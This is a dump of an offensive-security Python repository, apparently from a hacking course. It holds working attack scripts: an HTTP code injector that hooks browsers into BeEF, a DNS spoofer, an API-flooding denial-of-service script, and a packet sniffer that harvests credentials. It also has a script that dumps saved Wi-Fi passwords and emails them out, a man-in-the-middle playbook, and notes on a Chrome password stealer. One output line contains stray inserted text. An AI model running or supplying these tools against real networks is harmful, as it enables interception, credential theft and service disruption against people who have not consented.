| python-dev 9 | 10 | # THIS USSUALLY HAS ERRORS 11 | # pip3 install pybluez 12 | 13 | # So manually install it by source code 14 | wget https://github.com/pybluez/pybluez/archive/master.tar.gz 15 | tar -xzvf master.tar.gz 16 | cd pybluez-master 17 | # This requires sudo because of hardware interaction 18 | sudo python3 setup.py install 19 | 20 | # ==================================== 21 | # USAGE 22 | # > version python3.10 23 | ╰─$ python3 bluetooth-enum.py 24 | Scanning for Bluetooth devices... 25 | Found 2 devices. 26 | Address: 30:03:C8:2F:8E:E2, Name: SONY KD-75X80K 27 | Address: 04:7A:0B:0B:84:CD, Name: Mi Soundbar 28 | [('30:03:C8:2F:8E:E2', 'SONY KD-75X80K'), ('04:7A:0B:0B:84:CD', 'Mi Soundbar')] 29 | Connecting to AV Remote Control Target on 30:03:C8:2F:8E:E2... 30 | Could not connect: [Errno 111] Connection refused 31 | """ 32 | 33 | 34 | class BluetoothEnumerator: 35 | def __init__(self): 36 | # Initialize any necessary attributes 37 | pass 38 | 39 | def scan_for_devices(self): 40 | """Scans for nearby Bluetooth devices.""" 41 | print("Scanning for Bluetooth devices...") 42 | nearby_devices = bluetooth.discover_devices(lookup_names=True) 43 | 44 | if not nearby_devices: 45 | print("No devices found.") 46 | return [] 47 | 48 | print(f"Found {len(nearby_devices)} devices.") 49 | devices = [] 50 | for addr, name in nearby_devices: 51 | print(f" Address: {addr}, Name: {name}") 52 | devices.append((addr, name)) 53 | return devices 54 | 55 | def connect_to_device(self, address): 56 | """Attempts to connect to a Bluetooth device.""" 57 | service_matches = bluetooth.find_service(address=address) 58 | 59 | if not service_matches: 60 | print("No services found for the device.") 61 | return False 62 | 63 | first_match = service_matches[0] 64 | port = first_match["port"] 65 | name = first_match["name"] 66 | host = first_match["host"] 67 | 68 | print(f"Connecting to {name} on {host}...") 69 | 70 | # Create the client socket 71 | sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM) 72 | try: 73 | sock.connect((host, port)) 74 | print("Connected successfully.") 75 | return True 76 | except bluetooth.BluetoothError as e: 77 | print(f"Could not connect: {e}") 78 | return False 79 | finally: 80 | sock.close() 81 | 82 | # Usage 83 | if __name__ == "__main__": 84 | enumerator = BluetoothEnumerator() 85 | devices = enumerator.scan_for_devices() 86 | print(devices) 87 | 88 | # Connect to the first found device 89 | if devices: 90 | address = devices[0][0] 91 | enumerator.connect_to_device(address) 92 | -------------------------------------------------------------------------------- /code_injector.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import netfilterqueue 3 | import subprocess 4 | import scapy.all as scapy 5 | import re 6 | 7 | regex_string = 'Accept-Encoding:.*?\\r\\n' 8 | 9 | beef = '' 10 | alert = "" 11 | injection_code = beef 12 | 13 | def set_load(packet, load): 14 | packet[scapy.Raw].load = load 15 | del packet[scapy.IP].len 16 | del packet[scapy.IP].chksum 17 | del packet[scapy.TCP].chksum 18 | return packet 19 | 20 | def proccess_packet(packet): 21 | scapy_packet = scapy.IP(packet.get_payload()) 22 | if scapy_packet.haslayer(scapy.Raw): 23 | load = scapy_packet[scapy.Raw].load 24 | if scapy_packet[scapy.TCP].dport == 80: 25 | print("\n[+] HTTP Request") 26 | load =re.sub(regex_string, "", load) 27 | 28 | elif scapy_packet[scapy.TCP].sport == 80: 29 | print("\n[+] HTTP Response") 30 | print(load) 31 | load = load.replace("", injection_code + "") 32 | content_length_search = re.search("(?:Content-Length:\s)(\d*)", load) 33 | if content_length_search and "text/html" in load: 34 | content_length = content_length_search.group(1) 35 | new_content_length = int(content_length) + len(injection_code) 36 | load = load.replace(content_length, str(new_content_length)) 37 | print(content_length) 38 | 39 | if load != scapy_packet[scapy.Raw].load: 40 | new_packet = set_load(scapy_packet, load) 41 | packet.set_payload(str(new_packet)) 42 | packet.accept() 43 | 44 | # For local Testing 45 | # subprocess.call("iptables -I OUTPUT -j NFQUEUE --queue-num 0", shell=True) 46 | # subprocess.call("iptables -I INPUT -j NFQUEUE --queue-num 0", shell=True) 47 | 48 | # For Forwarding remote network 49 | subprocess.call("iptables -I FORWARD -j NFQUEUE --queue-num 0", shell=True) 50 | 51 | try: 52 | while True: 53 | queue = netfilterqueue.NetfilterQueue() 54 | queue.bind(0, proccess_packet) 55 | queue.run() 56 | except KeyboardInterrupt: 57 | subprocess.call("iptables --flush", shell=True) 58 | print("\nStopped.. IP Tables Flushed") -------------------------------------------------------------------------------- /dependencies/requirements-2.7.txt: -------------------------------------------------------------------------------- 1 | adns-python==1.2.1 2 | alembic==1.0.11.dev0 3 | asn1crypto==0.24.0 4 | astroid==1.6.6 5 | attrs==18.2.0 6 | autobahn==17.10.1 7 | Automat==0.6.0 8 | Babel==2.6.0 9 | backports-abc==0.5 10 | backports.functools-lru-cache==1.5 11 | bcrypt==3.1.6 12 | beautifulsoup4==4.8.0 13 | blinker==1.4 14 | bottle==0.12.15 15 | cbor==1.0.0 16 | certifi==2018.8.24 17 | Chameleon==2.24 18 | chardet==3.0.4 19 | CherryTree==0.38.8 20 | Click==7.0 21 | colorama==0.3.7 22 | configparser==3.5.0b2 23 | constantly==15.1.0 24 | cryptography==2.6.1 25 | cssselect==1.1.0 26 | Cython==0.29.2 27 | deprecation==2.0.6 28 | Django==1.11.23 29 | dnslib==0.9.7 30 | dnspython==1.16.0 31 | easygui==0.96 32 | EditorConfig==0.12.1 33 | Elixir==0.7.1 34 | entrypoints==0.3 35 | enum34==1.1.6 36 | faradaysec==3.8.0 37 | filedepot==0.5.2 38 | filteralchemy==0.1.0 39 | FormEncode==1.3.0 40 | fuse-python==1.0.0 41 | future==0.16.0 42 | futures==3.3.0 43 | gpg==1.12.0 44 | gyp==0.1 45 | html5lib==1.0.1 46 | hupper==1.5 47 | hyperlink==17.3.1 48 | idna==2.6 49 | impacket==0.9.19 50 | incremental==16.10.1 51 | ipaddress==1.0.17 52 | IPy==0.83 53 | isort==4.3.21 54 | itsdangerous==0.24 55 | Jinja2==2.10.1 56 | jsbeautifier==1.6.4 57 | jsonpickle==0.9.5 58 | keyring==18.0.1 59 | keyrings.alt==3.2.0 60 | lazy-object-proxy==1.4.3 61 | ldap3==2.5.1 62 | ldapdomaindump==0.9.1 63 | lxml==4.3.3 64 | lz4==1.1.0 65 | M2Crypto==0.31.0 66 | Mako==1.0.7 67 | MarkupSafe==1.1.0 68 | marshmallow==3.0.0b3 69 | marshmallow-sqlalchemy==0.14.1 70 | mccabe==0.6.1 71 | mechanize==0.2.5 72 | metaconfig==0.1.4a1 73 | mimerender==0.6.0 74 | msgpack==0.5.6 75 | mysqlclient==1.3.10 76 | netaddr==0.7.19 77 | NetfilterQueue==0.8.1 78 | NfSpy==1.0 79 | nplusone==1.0.0 80 | numpy==1.16.2 81 | olefile==0.46 82 | packaging==19.0 83 | paramiko==2.6.0 84 | passlib==1.7.1 85 | Paste==3.1.0 86 | PasteDeploy==2.0.1 87 | PasteScript==2.0.2 88 | peepdf==0.4.2 89 | pefile==2019.4.18 90 | pexpect==4.6.0 91 | Pillow==6.1.0 92 | plaster==1.0 93 | plaster-pastedeploy==0.5 94 | prettytable==0.7.2 95 | psycopg2==2.7.7 96 | py-ubjson==0.14.0 97 | pyasn1==0.4.2 98 | pyasn1-modules==0.2.1 99 | pycairo==1.16.2 100 | pycrypto==2.6.1 101 | pycryptodomex==3.6.1 102 | pydns==2.3.6 103 | pydot==1.4.1 104 | pyenchant==2.0.0 105 | PyGObject==3.32.2 106 | pyinotify==0.9.6 107 | pylibemu==0.3.3 108 | pylint==1.9.5 109 | pymssql==2.1.4 110 | PyNaCl==1.3.0 111 | pyOpenSSL==19.0.0 112 | pyparsing==2.2.0 113 | pypng==0.0.20 114 | PyQRCode==1.2.1 115 | pyquery==1.2.9 116 | pyramid==1.10.2 117 | PySocks==1.6.8 118 | pysqlite==2.7.0 119 | python-dateutil==2.7.3 120 | python-editor==1.0.3 121 | python-Levenshtein==0.12.0 122 | python-magic==0.4.16 123 | python-mimeparse==1.6.0 124 | python-openid==2.2.5 125 | python-slugify==3.0.2 126 | python-snappy==0.5.3 127 | pythonaes==1.0 128 | PyTrie==0.2 129 | pytz==2019.2 130 | PyV8==1.0.dev0 131 | pyxdg==0.26 132 | PyYAML==3.13 133 | qrcode==6.1 134 | repoze.lru==0.7 135 | requests==2.21.0 136 | scapy==2.4.2 137 | scapy-http==1.8.2 138 | scgi==1.13 139 | selenium==3.14.1 140 | service-identity==18.1.0 141 | simplejson==3.16.0 142 | singledispatch==3.4.0.3 143 | sip==4.19.18 144 | six==1.12.0 145 | soupsieve==1.9.2 146 | speaklater==1.3 147 | SQLAlchemy==1.3.1 148 | sqlalchemy-schemadisplay==1.3 149 | sqlparse==0.2.4 150 | Tempita==0.5.2 151 | tornado==5.1.1 152 | tqdm==4.28.1 153 | translationstring==1.3 154 | trollius==2.0.1 155 | Twisted==18.9.0 156 | txaio==2.10.0 157 | typing==3.6.6 158 | u-msgpack-python==2.1 159 | Unidecode==1.1.1 160 | urllib3==1.24.1 161 | venusian==1.2.0 162 | waitress==1.2.0b2 163 | webargs==5.1.2 164 | webencodings==0.5.1 165 | WebOb==1.8.5 166 | websocket-client==0.53.0 167 | WebTest==2.0.32 168 | Werkzeug==0.14.1 169 | wifite==2.2.5 170 | wrapt==1.12.0 171 | wsaccel==0.6.2 172 | WTForms==2.2.1 173 | zenmap==7.80 174 | zope.component==4.3.0 175 | zope.deprecation==4.4.0 176 | zope.event==4.2.0 177 | zope.hookable==4.0.4 178 | zope.interface==4.3.2 179 | -------------------------------------------------------------------------------- /dns_spoof.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import netfilterqueue 3 | import subprocess 4 | import scapy.all as scapy 5 | 6 | def proccess_packet(packet): 7 | scapy_packet = scapy.IP(packet.get_payload()) 8 | if scapy_packet.haslayer(scapy.DNSRR): 9 | qname = scapy_packet[scapy.DNSQR].qname 10 | if 'www.bing.com' in qname: 11 | print("[+] Spoofing target: {}".format(qname)) 12 | answer = scapy.DNSRR( 13 | rrname=qname, 14 | rdata="10.0.2.7" 15 | ) 16 | scapy_packet[scapy.DNS].an = answer 17 | scapy_packet[scapy.DNS].ancount = 1 18 | 19 | del scapy_packet[scapy.IP].len 20 | del scapy_packet[scapy.IP].chksum 21 | del scapy_packet[scapy.UDP].len 22 | del scapy_packet[scapy.UDP].chksum 23 | 24 | packet.set_payload(str(scapy_packet)) 25 | 26 | packet.accept() 27 | 28 | # For local Testing 29 | # subprocess.call("iptables -I OUTPUT -j NFQUEUE --queue-num 0", shell=True) 30 | # subprocess.call("iptables -I INPUT -j NFQUEUE --queue-num 0", shell=True) 31 | 32 | # For Forwarding remote network 33 | subprocess.call("iptables -I FORWARD -j NFQUEUE --queue-num 0", shell=True) 34 | 35 | try: 36 | while True: 37 | queue = netfilterqueue.NetfilterQueue() 38 | queue.bind(0, proccess_packet) 39 | queue.run() 40 | except KeyboardInterrupt: 41 | subprocess.call("iptables --flush", shell=True) 42 | print("\nStopped.. IP Tables Flushed") -------------------------------------------------------------------------------- /dos_api.py: -------------------------------------------------------------------------------- 1 | from multiprocessing import Pool 2 | import requests 3 | import json 4 | import time 5 | 6 | url = "https://api.xyz/register" 7 | 8 | def f(i): 9 | payload = { 10 | "name": "satoshi nakamoto", 11 | "password": "xyz", 12 | "email": f"satoshi+{i}@sample.xyz" 13 | } 14 | 15 | headers = { 16 | 'Content-Type': "application/json", 17 | 'User-Agent': "PostmanRuntime/7.13.0", 18 | 'Accept': "*/*", 19 | 'Connection': "keep-alive", 20 | 'cache-control': "no-cache" 21 | } 22 | 23 | response = requests.post(url, data=json.dumps(payload), headers=headers) 24 | # Needs to be .txt, as json() will make an error if the server choked 25 | print(i, response.text) 26 | 27 | return response 28 | 29 | 30 | def main(number_of_request): 31 | p = Pool(16) 32 | return p.map(f, range(number_of_request)) 33 | 34 | 35 | if __name__ == '__main__': 36 | start_time = time.time() 37 | number_of_request = 1000 38 | print(f"[+] {number_of_request} Requests") 39 | result = str(main(number_of_request)) 40 | print("--- %s seconds ---" % (time.time() - start_time)) 41 | 42 | success = result.count("20") 43 | server = result.count("50") 44 | error = result.count("40") 45 | 46 | print("success: ", success) 47 | print("server errors: ", server) 48 | print("client errors: ", error) 49 | -------------------------------------------------------------------------------- /encryption/aes256-cipher/aes-cipher.py: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import AES 2 | from Crypto.Random import get_random_bytes 3 | from Crypto.Util.Padding import pad, unpad 4 | from Crypto.Hash import SHA256 5 | import base64 6 | 7 | """ 8 | pip3 install pycryptodome 9 | 10 | """ 11 | 12 | class AESCipher: 13 | 14 | def __init__(self, key=None): 15 | """ 16 | Initializes the AES Cipher. If a string key is provided, it is hashed to create a 32-byte key. 17 | """ 18 | if isinstance(key, str): 19 | # Hash the key to ensure it's 32 bytes long 20 | self.key = SHA256.new(key.encode('utf-8')).digest() 21 | elif key is not None: 22 | # Assuming key is a byte array of length 32 23 | self.key = key 24 | else: 25 | # Generate a random 32-byte key 26 | self.key = get_random_bytes(32) 27 | 28 | def encrypt(self, data): 29 | """ 30 | Encrypts the given data using AES-256. 31 | """ 32 | cipher = AES.new(self.key, AES.MODE_CBC) 33 | ct_bytes = cipher.encrypt(pad(data.encode('utf-8'), AES.block_size)) 34 | iv = base64.b64encode(cipher.iv).decode('utf-8') 35 | ct = base64.b64encode(ct_bytes).decode('utf-8') 36 | return {'iv': iv, 'ciphertext': ct} 37 | 38 | def decrypt(self, enc_dict): 39 | """ 40 | Decrypts the given data (provided as a dict with 'iv' and 'ciphertext') using AES-256. 41 | """ 42 | iv = base64.b64decode(enc_dict['iv']) 43 | ct = base64.b64decode(enc_dict['ciphertext']) 44 | cipher = AES.new(self.key, AES.MODE_CBC, iv) 45 | pt = unpad(cipher.decrypt(ct), AES.block_size) 46 | return pt.decode('utf-8') 47 | 48 | # Example Usage 49 | if __name__ == "__main__": 50 | # Using a string as a key 51 | aes = AESCipher("my_secret_key") 52 | 53 | # Encrypt 54 | encrypted = aes.encrypt("Hello, World!") 55 | print("Encrypted:", encrypted) 56 | 57 | # Decrypt 58 | decrypted = aes.decrypt(encrypted) 59 | print("Decrypted:", decrypted) 60 | -------------------------------------------------------------------------------- /execute_and_report.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import subprocess, smtplib, re 4 | 5 | def send_mail(email, password, message): 6 | server = smtplib.SMTP("smtp.gmail.com", 587) 7 | server.starttls() 8 | server.login(email, password) 9 | server.sendmail(email, email, message) 10 | server.quit() 11 | 12 | # For Windows 13 | command = "netsh wlan show profile" 14 | networks = subprocess.check_output(command, shell=True) 15 | network_name_list = re.findall( 16 | "(?:Profile\s*:\s)(.*)", networks 17 | ) 18 | 19 | result = "" 20 | for network_name in network_name_list: 21 | command = "netsh wlan show profile {} key=clear".format(network_name) 22 | current_result = subprocess.check_output(command, shell=True) 23 | result = result + current_result 24 | 25 | email = "" 26 | password = "" 27 | 28 | send_mail(email, password, result) -------------------------------------------------------------------------------- /mac_changer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import subprocess 4 | import optparse 5 | import re 6 | from util.randomize_mac import get_mac_address 7 | 8 | def get_arguments(): 9 | parser = optparse.OptionParser() 10 | parser.add_option('-i', '--interface', dest="interface", 11 | help=' Interface to change its MAC address ') 12 | parser.add_option('-m', '--mac', dest="mac_address", 13 | help=' New MAC address to use') 14 | (options, arguments) = parser.parse_args() 15 | if not options.interface: 16 | parser.error("[-] Please Specify an interface, use --help") 17 | print("MAC Address is auto Generated, just add -m if you want to specify") 18 | if not options.mac_address: 19 | #parser.error("[-] Please Specify an new MAC address, use --help") 20 | options.mac_address = get_mac_address() 21 | 22 | # For improvement add auto mac address 00:11:22:33:44:55 23 | print(options) 24 | return options 25 | 26 | def change_mac(interface, mac_address): 27 | print 28 | print("-"*60) 29 | print("[+] Changing MAC address for {} to {}".format(interface, mac_address)) 30 | 31 | subprocess.call([ "ifconfig", interface, "down" ]) 32 | subprocess.call([ "ifconfig", interface, "hw", "ether", mac_address ]) 33 | subprocess.call([ "ifconfig", interface, "up" ]) 34 | print("-"*60) 35 | 36 | def get_current_mac(interface): 37 | print 38 | ifconfig_result=subprocess.check_output(["ifconfig", interface]) 39 | 40 | mac_adddress_search_result = re.search(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", ifconfig_result) 41 | if mac_adddress_search_result: 42 | return mac_adddress_search_result.group(0) 43 | else: 44 | print("[-] No MAC address") 45 | 46 | options = get_arguments() 47 | current_mac = get_current_mac(options.interface) 48 | print("Current MAC Adress: {} in {}".format(str(current_mac), options.interface)) 49 | 50 | change_mac(options.interface, options.mac_address) 51 | 52 | new_mac = get_current_mac(options.interface) 53 | if new_mac == options.mac_address: 54 | print("[+] Interface: {}".format(options.interface)) 55 | print("[+] MAC address Successfully changed to {}".format(new_mac)) 56 | else: 57 | print("[-] MAC address did not get changed.") 58 | -------------------------------------------------------------------------------- /net_cut.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import netfilterqueue 3 | import subprocess 4 | 5 | def proccess_packet(packet): 6 | print(packet) 7 | packet.accept() 8 | 9 | subprocess.call("iptables -I FORWARD -j NFQUEUE --queue-num 0", shell=True) 10 | 11 | try: 12 | while True: 13 | queue = netfilterqueue.NetfilterQueue() 14 | queue.bind(0, proccess_packet) 15 | queue.run() 16 | except KeyboardInterrupt: 17 | subprocess.call("iptables --flush", shell=True) 18 | print("\nStopped.. IP Tables Flushed") -------------------------------------------------------------------------------- /network_ping.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import scapy.all as scapy 4 | import optparse 5 | 6 | def scapy_scan(ip): 7 | scapy.arping(ip) 8 | 9 | scapy_scan("192.168.100.1/24") 10 | -------------------------------------------------------------------------------- /network_scanner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import scapy.all as scapy 4 | import optparse 5 | 6 | def get_arguments(): 7 | parser = optparse.OptionParser() 8 | parser.add_option('-t', '--target', dest="target", 9 | help=' Target Range of IP address ex: 10.0.2.1/24 ') 10 | (options, arguments) = parser.parse_args() 11 | if not options.target: 12 | parser.error("[-] Please Specify an IP range, use --help") 13 | # For improvement add auto input of IP address range 14 | return options 15 | 16 | 17 | def scapy_scan(ip): 18 | scapy.arping(ip) 19 | 20 | def scan(ip): 21 | arp_request = scapy.ARP(pdst=ip) 22 | broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") # 34. Combining Frames Review 23 | arp_request_broadcast = broadcast/arp_request 24 | answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0] # this returns two list; answered and unanswered 25 | 26 | client_list = [] 27 | for e in answered_list: 28 | client_dict = { 29 | "ip" : e[1].psrc, 30 | 'mac' : e[1].hwsrc 31 | } 32 | client_list.append(client_dict) 33 | return client_list 34 | 35 | def print_result(result_list): 36 | print("IP\t\t\tMAC Address") 37 | print("-"*50) 38 | for client in result_list: 39 | print(client["ip"] + "\t\t" + client["mac"]) 40 | 41 | options = get_arguments() 42 | scan_result = scan(options.target) 43 | print_result(scan_result) 44 | -------------------------------------------------------------------------------- /packet_sniffer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import scapy.all as scapy 4 | from scapy.layers import http 5 | import subprocess 6 | import netifaces 7 | 8 | def sniff(interface): 9 | scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet) 10 | 11 | def get_url(packet): 12 | return "{}{}".format(packet[http.HTTPRequest].Host, packet[http.HTTPRequest].Path) 13 | 14 | def get_login_info(packet): 15 | if packet.haslayer(scapy.Raw): 16 | # print(packet) 17 | load = packet[scapy.Raw].load 18 | keywords = [ 19 | 'username', 'login', 'uname', 20 | 'user', 'password', 'pass', 21 | 'passwd', 'sign', 'name' 22 | ] 23 | 24 | for keyword in keywords: 25 | if keyword in load: 26 | return load 27 | 28 | def process_sniffed_packet(packet): 29 | if packet.haslayer(http.HTTPRequest): 30 | # print(packet.show()) 31 | url = get_url(packet) 32 | print("[+] HTTP Request >>> {}".format(url)) 33 | login_info = get_login_info(packet) 34 | if login_info: 35 | print("\n"*2) 36 | print("="*60) 37 | print("[+] Possible username/password") 38 | print(login_info) 39 | print("="*60) 40 | 41 | def get_interfaces(): 42 | i = 0 43 | interfaces = netifaces.interfaces() 44 | print("Choose the number of the interface to Sniff:") 45 | for interface in interfaces: 46 | print("{}\t\t{}".format(i, interface)) 47 | i = i + 1 48 | 49 | return interfaces 50 | 51 | 52 | interfaces = get_interfaces() 53 | choice = input("Give me the number: ") 54 | sniff(interfaces[int(choice)]) 55 | -------------------------------------------------------------------------------- /parsers/curl_parser.py: -------------------------------------------------------------------------------- 1 | import re 2 | 3 | def parse_curl_command(file_path): 4 | with open(file_path, 'r') as file: 5 | curl_command = file.read().strip() 6 | 7 | # Extract URL 8 | url_match = re.search(r"curl '([^']*)'", curl_command) 9 | url = url_match.group(1) if url_match else None 10 | 11 | # Extract headers 12 | headers = dict(re.findall(r"-H '([^:]*): ([^']*)'", curl_command)) 13 | 14 | # Extract data 15 | data_match = re.search(r"--data-raw '([^']*)'", curl_command) 16 | raw_data = data_match.group(1) if data_match else None 17 | data = dict(re.findall(r"([^=&]+)=([^&]*)", raw_data)) 18 | 19 | return url, headers, data 20 | 21 | if __name__ == "__main__": 22 | file_path = "curl.sh" 23 | url, headers, data = parse_curl_command(file_path) 24 | 25 | print("URL:", url) 26 | print("Headers:", headers) 27 | print("Data:", data) 28 | 29 | """ 30 | test references for this tool 31 | https://tryhackme.com/r/room/hackpark admin page 32 | 33 | USAGE: 34 | cat curl.sh 35 | curl 'http://10.10.89.155/Account/login.aspx?ReturnURL=%2fadmin%2f' \ 36 | -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8' \ 37 | -H 'Accept-Language: en-US,en' \ 38 | -H 'Cache-Control: max-age=0' \ 39 | -H 'Connection: keep-alive' \ 40 | -H 'Content-Type: application/x-www-form-urlencoded' \ 41 | -H 'Origin: http://10.10.89.155' \ 42 | -H 'Referer: http://10.10.89.155/Account/login.aspx?ReturnURL=/admin/' \ 43 | -H 'Sec-GPC: 1' \ 44 | -H 'Upgrade-Insecure-Requests: 1' \ 45 | -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' \ 46 | --data-raw '__VIEWSTATE=nXHfYuqA534xpFQkk6W8SrUZNTcDpV%2FPQKezTUXeuJfrcMWTHBLtxWCdQc7VrGKzSfJt1Y44zTOgSTHQ0bgeVsJQZ0XPRkZ8YNtGe1eWYPaRGB%2FR%2F9CKOXZvWL%2Br5cJ3qR2vGpppxR5iP2Dwr8hlmf01Egxrg5RdXC38VFZoNU2aIQ7t&__EVENTVALIDATION=t8feE4JxAmSK7vpQVVd5kuBhs04HtAo5iDVznGukHJSGS55BtID8GP90SwWEblYqvJeaoMO0r78P8liuKDnPlSVeR%2FWbG5z8p1vXtxlBBzlrvlzSkJ1gHIKrfm6QHBgj6bDyZ3sy8fj%2BcLb6s0fA%2B2RRJbAOFGWYTh8oB1wcueJkutpM&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=FUZZ&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in' \ 47 | --insecure 48 | 49 | ╰─$ python3 curl_parser.py 50 | URL: http://10.10.89.155/Account/login.aspx?ReturnURL=%2fadmin%2f 51 | Headers: {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8', 'Accept-Language': 'en-US,en', 'Cache-Control': 'max-age=0', 'Connection': 'keep-alive', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://10.10.89.155', 'Referer': 'http://10.10.89.155/Account/login.aspx?ReturnURL=/admin/', 'Sec-GPC': '1', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'} 52 | Data: {'__VIEWSTATE': 'nXHfYuqA534xpFQkk6W8SrUZNTcDpV%2FPQKezTUXeuJfrcMWTHBLtxWCdQc7VrGKzSfJt1Y44zTOgSTHQ0bgeVsJQZ0XPRkZ8YNtGe1eWYPaRGB%2FR%2F9CKOXZvWL%2Br5cJ3qR2vGpppxR5iP2Dwr8hlmf01Egxrg5RdXC38VFZoNU2aIQ7t', '__EVENTVALIDATION': 't8feE4JxAmSK7vpQVVd5kuBhs04HtAo5iDVznGukHJSGS55BtID8GP90SwWEblYqvJeaoMO0r78P8liuKDnPlSVeR%2FWbG5z8p1vXtxlBBzlrvlzSkJ1gHIKrfm6QHBgj6bDyZ3sy8fj%2BcLb6s0fA%2B2RRJbAOFGWYTh8oB1wcueJkutpM', 'ctl00%24MainContent%24LoginUser%24UserName': 'admin', 'ctl00%24MainContent%24LoginUser%24Password': 'FUZZ', 'ctl00%24MainContent%24LoginUser%24LoginButton': 'Log+in'} 53 | 54 | 55 | TODO: 56 | - try to urlparse if there's problem 57 | """ -------------------------------------------------------------------------------- /parsers/ffuf-translatory.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | 4 | def parse_request_file(request_file): 5 | with open(request_file, "r") as file: 6 | lines = file.readlines() 7 | 8 | method, uri, _ = lines[0].split() 9 | uri = "http://" + lines[1].split()[1] + uri 10 | 11 | headers = {} 12 | data = "" 13 | is_data = False 14 | 15 | for line in lines[2:]: 16 | if line.strip() == "": 17 | is_data = True 18 | continue 19 | if is_data: 20 | data += line.strip() 21 | else: 22 | key, value = line.split(": ", 1) 23 | headers[key] = value.strip() 24 | 25 | return method, uri, headers, data 26 | 27 | 28 | def generate_ffuf_command(method, uri, headers, data): 29 | command = f"ffuf -u {uri} -X {method} \\\n" 30 | 31 | for key, value in headers.items(): 32 | command += f"-H '{key}: {value}' \\\n" 33 | 34 | command += f"-d '{data}' \\\n" 35 | command += "-w /usr/share/wordlists/rockyou.txt" 36 | 37 | return command 38 | 39 | 40 | if __name__ == "__main__": 41 | parser = argparse.ArgumentParser(description="Convert HTTP request to FFUF command") 42 | parser.add_argument( 43 | "-r", "--request", required=True, help="Path to the raw HTTP request file" 44 | ) 45 | 46 | args = parser.parse_args() 47 | method, uri, headers, data = parse_request_file(args.request) 48 | ffuf_command = generate_ffuf_command(method, uri, headers, data) 49 | 50 | print(ffuf_command) 51 | 52 | """ 53 | Last tested: 2024.07.06 54 | Example USAGE: 55 | cat loots/admin-login-request.txt 56 | POST /app/castle/index.php/login/authenticate/concrete HTTP/1.1 57 | Host: 10.10.159.195:85 58 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0 59 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 60 | Accept-Language: en-US,en;q=0.5 61 | Accept-Encoding: gzip, deflate, br 62 | Content-Type: application/x-www-form-urlencoded 63 | Content-Length: 82 64 | Origin: http://10.10.159.195:85 65 | Connection: close 66 | Referer: http://10.10.159.195:85/app/castle/index.php/login 67 | Upgrade-Insecure-Requests: 1 68 | 69 | uName=admin&uPassword=FUZZ&ccm_token=1720244709%3A0735f56c4e877235e5fe021daeec3e69 70 | 71 | 72 | ╰─$ python3 scripts/ffuf-translator.py -r loots/admin-login-request.txt 73 | ffuf -u http://10.10.159.195:85/app/castle/index.php/login/authenticate/concrete -X POST \ 74 | -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:Please don't use that phrase 109.0) Gecko/20100101 Firefox/109.0' \ 75 | -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' \ 76 | -H 'Accept-Language: en-US,en;q=0.5' \ 77 | -H 'Accept-Encoding: gzip, deflate, br' \ 78 | -H 'Content-Type: application/x-www-form-urlencoded' \ 79 | -H 'Content-Length: 82' \ 80 | -H 'Origin: http://10.10.159.195:85' \ 81 | -H 'Connection: close' \ 82 | -H 'Referer: http://10.10.159.195:85/app/castle/index.php/login' \ 83 | -H 'Upgrade-Insecure-Requests: 1' \ 84 | -d 'uName=admin&uPassword=FUZZ&ccm_token=1720244709%3A0735f56c4e877235e5fe021daeec3e69' \ 85 | -w /usr/share/wordlists/rockyou.txt 86 | """ 87 | -------------------------------------------------------------------------------- /playbook.md: -------------------------------------------------------------------------------- 1 | # Playbook 2 | 3 | ## Steps 4 | mac_changer -> network_scanner -> arp_spoof -> packet_sniffer 5 | 6 | ## Sniffing Credentials 7 | network_scanner -> arp_spoof -> packet_sniffer 8 | 9 | ## Replace Download 10 | network_scanner -> arp_spoof -> replace_download 11 | 12 | ## Hooking in Beef 13 | network_scanner > arp_spoof > code_injector 14 | 15 | > Scan first to get your target's IP 16 | > then arp spoof to become the man in the middle 17 | > then inject your script using code injector to hook 18 | > them in the BEEF Xss framework 19 | -------------------------------------------------------------------------------- /post-connection/README.md: -------------------------------------------------------------------------------- 1 | # Post Connection Attacks 2 | 3 | ## Chrome Password Stealer 4 | 5 | ### For Mac 6 | Decrypt Google Chrome and Chromium Passwords on Mac OS X. No dependencies, quick, fast. 7 | These are the passwords saved via the "Would you like to remember this password" popup when you login to a website. 8 | Great for if you want to export all of your passwords with one command, as oppposed to manually selecting each one through Chrome's UI. 9 | Also great for forensic analysis, as you can obtain the safe storage key through a variety of methods. 10 | 11 | **Information** 12 | 13 | 1. Look for any encrypted password data stored in ```~/Library/Application Support/Google/Chrome/Profiles */Login Data``` 14 | 